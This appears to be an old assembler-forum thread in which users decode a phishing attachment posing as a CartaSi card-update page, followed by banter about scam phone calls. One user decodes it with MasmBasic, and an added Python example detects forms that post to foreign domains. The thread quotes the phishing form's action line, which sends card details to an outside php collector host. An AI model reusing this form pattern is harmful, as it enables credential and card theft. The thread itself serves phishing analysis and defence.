Phishers attacking....

Started by jj2007, February 11, 2012, 07:15:10 AM

jj2007

Got this as an attachment to an email asking to update my credit card info (conto on-line.shtml, attached):
<Script Language='Javascript'>
<!-- HTML Encryption provided by CartaSi S.p.A. -->
<!--
document.write(unescape('%3C%21...6D%6C%3E%0A'));
//-->
</Script>

88k of escape sequences... no problem :green2

include \masm32\MasmBasic\MasmBasic.inc   ; download
   Init
   Let esi=FileRead$("conto on-line.shtml")
   Let edi=New$(LastFileSize)
   xor ecx, ecx
   .if Instr_(esi, "unescape")   ; unescape('%3C%21...6D%6C%3E%0A'
      lea ebx, [edx+11]
      .Repeat
         Let Mid$(esi, ebx+2)="h"   ; replace the % with an h
         lea eax, [esi+ebx-1]
         void Val(Mid$(esi, ebx, 3))   ; convert e.g. 3Ch
         .Break .if edx!=0203h   ; dh=2 means valid Hex$, dl=3 means 3 bytes used
         add ebx, 3
         mov [edi+ecx], al
         inc ecx
      .Until 0
   .endif
   FileWrite "test.txt", edi
   Inkey Str$("test.txt written, %i bytes", ecx)
   Exit
end start

It turns out that the file is full of references to the valid cartasi site, plus one that doesn't fit the picture:

form name="theForm" id="theForm" action="http://static.55.110.46.78.clients.your-server.de/icons/small/more1.php" method="POST"

So your-server.de got a mail, and their automated service created a response. We'll see :bg
What I don't understand is that this fight against phishing cannot be automated, it's so easy, and so obviously fraud ::)
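An added example, not part of the original post: the same triage in Python, decoding the `unescape('...')` payload statically and flagging any form whose action host lies outside the domain the page claims to belong to. It goes beyond the post by also decoding `%uXXXX` sequences; `bank.example`, `collector.invalid` and the sample attachment are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Matches the string literal passed to unescape('...') or unescape("...").
UNESCAPE_CALL = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
ESCAPE_SEQ = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")

def js_unescape(text):
    """Static equivalent of JavaScript unescape(): decodes %XX and %uXXXX."""
    return ESCAPE_SEQ.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), text)

class FormActions(HTMLParser):
    """Collects the action attribute of every <form> tag."""
    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")

def foreign_form_targets(page, trusted_domain):
    """Decode each unescape() literal (no script is executed) and return form
    actions whose host is neither trusted_domain nor one of its subdomains."""
    flagged = []
    for match in UNESCAPE_CALL.finditer(page):
        parser = FormActions()
        parser.feed(js_unescape(match.group(2)))
        for action in parser.actions:
            host = (urlsplit(action).hostname or "").lower()
            if host and host != trusted_domain and not host.endswith("." + trusted_domain):
                flagged.append(action)
    return flagged

# Constructed sample: legitimate-looking links plus one form posting elsewhere.
SAMPLE_HTML = (
    '<html><a href="https://www.bank.example/help">Help</a>'
    '<form name="theForm" action="http://collector.invalid/more1.php" method="POST">'
    '<input name="card"></form>'
    '<form action="https://secure.bank.example/login" method="POST"></form></html>'
)
SAMPLE_ATTACHMENT = (
    "<Script Language='Javascript'>\n<!--\ndocument.write(unescape('"
    + "".join("%%%02X" % ord(c) for c in SAMPLE_HTML)
    + "'));\n//-->\n</Script>"
)

if __name__ == "__main__":
    print(foreign_form_targets(SAMPLE_ATTACHMENT, "bank.example"))
```

Forms with a relative action have no host and are skipped here, since a locally opened attachment gives them nowhere remote to post to.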

sinsi

Light travels faster than sound, that's why some people seem bright until you hear them.

jj2007

Quote from: sinsi on February 11, 2012, 07:30:05 AM
GIGO?

What's that, a scrambled version? Every second char increased by one? :bg

sinsi

Your code, your zip, you tell me :P

jj2007

Quote from: sinsi on February 11, 2012, 08:17:28 AM
Your code, your zip, you tell me :P

Sinsi, my friend, either you are pulling my leg, or you are using a strange version of MB. AFAIK this stuff has worked for ages. Can you zip your exe and post it please? Thanks.

I attach the full source code and my exe.

sinsi

OK with the latest masm32 and masmbasic I get a html document.
Do you mean to tell me that masmbasic has bugs?  :bg
You're as bad as microsoft, always having to update things...jk

jj2007

Quote from: sinsi on February 11, 2012, 09:48:03 AM
OK with the latest masm32 and masmbasic I get a html document.
Do you mean to tell me that masmbasic has bugs?  :bg
You're as bad as microsoft, always having to update things...jk

MasmBasic has no bugs, only features :green
(but your version must have been prehistoric - definitely more than one year old :wink)

oex

Quote from: jj2007 on February 11, 2012, 11:21:46 AM
(but your version must have been prehistoric :wink)

How old are you JJ?
We are all of us insane, just to varying degrees and intelligently balanced through networking

http://www.hereford.tv

jj2007

Quote from: oex on February 11, 2012, 11:28:35 AM
Quote from: jj2007 on February 11, 2012, 11:21:46 AM
(but your version must have been prehistoric :wink)

How old are you JJ?

Some months less than Bill Gates. I produce less bugs :8)

vanjast

As everyone should know...
If you get a phone call, email, post with anything regarding private/personal/financial information.. You just put the phone down, delete email or burn the post, after taking note of its details, for the authorities.

I get lots of phone calls with some woshead on the other side, who always make the mistake of getting my name wrong in various forms of phuggitup.
I just reply.. "You're bre--akin.. up.. hel  hell  o",  and put the phone down

I got this phone call from this one woman and I was in a good sadistic mood so I was nice and polite
She didn't drop the punchline until the very end 5 minutes of rambling on about everything except the money.
She had booked my place for me and asked what time I'd arrive... to which I replied that I will not be arriving.
Why.. with all the good deals she said. I said that all I wanted to do, was see how long she'd take to ask me for money, of which she would not be getting a cent.
The line was cut very quickly.....  :bg :bg

hutch--

Do you guys ever get this one, a phone call from someone with a very heavy Dephi Call Centre accent claiming to be the Computer Maintenance Department with Microsoft certification?

I cannot repeat my response as this is a wholesome and respectable venue for assembler programmers but it does the job in less than 5 seconds.  :bg
Download site for MASM32      New MASM Forum
https://masm32.com          https://masm32.com/board/index.php

anunitu

I have from time to time had to deal with sales people, and I am a bit intimidating for them. I came home one day to find my Ex. with a HIGH pressure sales guy. She is a polite person, and the sales people use your politeness against you. I do not suffer from feeling I must be polite. The sales guy got this from me. "What the F*** are you doing in my house?".. He got this strange look on his face, and tried to go into his spiel.. I just went into my BAMF (Bad A** MotherF***) persona, and kicked him out. Most people are trained in their life to not be aggressive when you are talking with someone, and these people will use that to manipulate you. Like Hutch, I can't post my exact words because we are a polite group of educated programmers... :bdg

sinsi

Quote from: hutch-- on February 11, 2012, 01:15:13 PM
Do you guys ever get this one, a phone call from someone with a very heavy Dephi Call Centre accent claiming to be the Computer Maintenance Department with Microsoft certification?

I cannot repeat my response as this is a wholesome and respectable venue for assembler programmers but it does the job in less than 5 seconds.  :bg

Sad to say I have had quite a few jobs where the customer gets so far, thinks something's fishy, hangs up then calls me out, just in case.
They get remote control of your computer - with your permission - and install free software, then try to charge you for it.
One old bloke (in his 80s) actually signed up for a 'lifetime support' plan, around $300, since he thought it was good value.
I convinced him that it was a scam and to call his bank to cancel it.

heh, they called my sister 6 times in 2 weeks, she has no internet and no computer. Even when she told them they still went on and on...she leaves the phone on the counter and hangs it up when she remembers to check, an hour later. The number actually shows up as a Sydney (02) number here even though it's overseas. Thought you couldn't spoof a CND in aus?

vanjast

Quote from: hutch-- on February 11, 2012, 01:15:13 PM
I cannot repeat my response as this is a wholesome and respectable venue for assembler programmers ... :bg

I'm really flattered that you think so highly of us...

Do carry on..!!  I'm all ears
:green2